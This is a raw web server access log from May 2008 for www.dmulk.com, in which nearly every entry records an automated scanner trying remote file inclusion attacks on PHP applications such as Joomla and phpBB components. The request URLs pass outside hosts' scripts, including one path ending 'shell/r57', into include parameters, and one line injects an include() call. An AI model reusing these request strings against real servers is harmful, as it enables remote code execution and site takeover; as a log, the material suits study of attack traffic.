217.67.26.84 - - [19/May/2008:11:47:45 -0700] "GET /logs/page.php5?id=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [19/May/2008:11:47:46 -0700] "GET /logs/page.php5?id=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [19/May/2008:11:47:46 -0700] "GET /page.php5?id=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [19/May/2008:11:47:46 -0700] "GET /page.php5?id=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:11:47:50 -0700] "GET /logs//podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:11:47:50 -0700] "GET //podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.24.52.96 - - [19/May/2008:11:48:14 -0700] "GET /logs/main.php?x=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.24.52.96 - - [19/May/2008:11:48:14 -0700] "GET /main.php?x=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:48:29 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:48:29 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.232.188 - - [19/May/2008:11:48:33 -0700] "GET /logs/access_080221.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.h1.ripway.com/qalby/shell/r57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.67.24.145 - - [19/May/2008:11:48:34 -0700] "GET /logs/help.php?lang=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.130.232.188 - - [19/May/2008:11:48:34 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.h1.ripway.com/qalby/shell/r57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.67.24.145 - - [19/May/2008:11:48:34 -0700] "GET /help.php?lang=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.130.232.188 - - [19/May/2008:11:48:34 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.h1.ripway.com/qalby/shell/r57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:48:52 -0700] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.232.188 - - [19/May/2008:11:48:53 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.h1.ripway.com/qalby/shell/r57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:11:48:54 -0700] "GET /logs/access_080327.log/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:11:49:05 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:11:49:05 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:49:09 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:49:09 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:49:09 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:49:10 -0700] "GET /logs/access_080311.log/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:49:11 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:49:11 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:49:11 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:49:46 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:49:46 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:11:49:50 -0700] "GET /logs/index.php?incl=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:11:49:55 -0700] "GET /index.php?incl=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
81.177.9.21 - - [19/May/2008:11:49:57 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.9.21 - - [19/May/2008:11:49:57 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.9.21 - - [19/May/2008:11:49:58 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.39.235 - - [19/May/2008:11:50:13 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://st.satunweb.net/~admin20/components/com_simpleboard/albania1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.39.235 - - [19/May/2008:11:50:14 -0700] "GET //config/dbutil.bck.php?confdir=http://st.satunweb.net/~admin20/components/com_simpleboard/albania1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.39.235 - - [19/May/2008:11:50:14 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://st.satunweb.net/~admin20/components/com_simpleboard/albania1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:50:19 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:50:20 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:50:20 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/May/2008:11:50:23 -0700] "GET /logs/access_080127.log/index1.php?menu=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/May/2008:11:50:32 -0700] "GET /logs/access_080207.log/index1.php?menu=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:50:34 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:11:50:42 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
70.86.229.242 - - [19/May/2008:11:50:51 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
189.132.59.225 - - [19/May/2008:11:51:04 -0700] "GET /logs/access_080215.log/index.php?x=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.132.59.225 - - [19/May/2008:11:51:06 -0700] "GET /index.php?x=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
189.132.59.225 - - [19/May/2008:11:51:06 -0700] "GET /logs/index.php?x=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:52:00 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:52:00 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:52:00 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:11:52:02 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:52:03 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.39.235 - - [19/May/2008:11:52:09 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://st.satunweb.net/~admin20/components/com_simpleboard/albania1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.39.235 - - [19/May/2008:11:52:10 -0700] "GET //config/dbutil.bck.php?confdir=http://st.satunweb.net/~admin20/components/com_simpleboard/albania1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.39.235 - - [19/May/2008:11:52:10 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://st.satunweb.net/~admin20/components/com_simpleboard/albania1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:52:12 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:52:27 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:52:57 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:53:15 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:53:21 -0700] "GET /logs/access_080322.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:53:21 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.9.21 - - [19/May/2008:11:53:29 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:53:38 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:53:39 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:11:53:47 -0700] "GET /logs/access_080124.log/cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:53:49 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.177.9.21 - - [19/May/2008:11:53:59 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.6.155.217 - - [19/May/2008:11:54:00 -0700] "GET /logs//podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.6.155.217 - - [19/May/2008:11:54:05 -0700] "GET //podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.222.167.228 - - [19/May/2008:11:54:29 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:54:32 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:54:32 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:54:32 -0700] "GET /modules/My_eGallery/index.php?basepath=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:54:32 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:54:32 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:54:32 -0700] "GET /modules/My_eGallery/index.php?basepath=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:54:32 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:54:33 -0700] "GET /modules/My_eGallery/index.php?basepath=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:54:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:54:33 -0700] "GET /modules/My_eGallery/index.php?basepath=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:54:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:54:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:54:38 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.167.228 - - [19/May/2008:11:54:40 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:11:54:46 -0700] "GET /logs/access_080121.log/cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.53.51.228 - - [19/May/2008:11:54:47 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.53.51.228 - - [19/May/2008:11:54:47 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.67.157.165 - - [19/May/2008:11:54:47 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.67.157.165 - - [19/May/2008:11:54:48 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:56:42 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:56:59 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:57:03 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:57:03 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:57:18 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.146.70.18 - - [19/May/2008:11:57:21 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.146.70.18 - - [19/May/2008:11:57:21 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:57:31 -0700] "GET /logs/access_080412.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:57:34 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:57:34 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:57:34 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:57:35 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 200 11590 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:57:36 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
206.53.51.228 - - [19/May/2008:11:57:41 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:57:47 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:57:57 -0700] "GET /logs/access_071219.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:57:57 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:57:59 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:11:58:06 -0700] "GET /include/bbs.lib.inc.php?site_path=http://blackcard.newsit.es/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.230.34 - - [19/May/2008:11:58:20 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.230.34 - - [19/May/2008:11:58:20 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.94.160.10 - - [19/May/2008:11:58:30 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.94.160.10 - - [19/May/2008:11:58:30 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:58:33 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:58:33 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
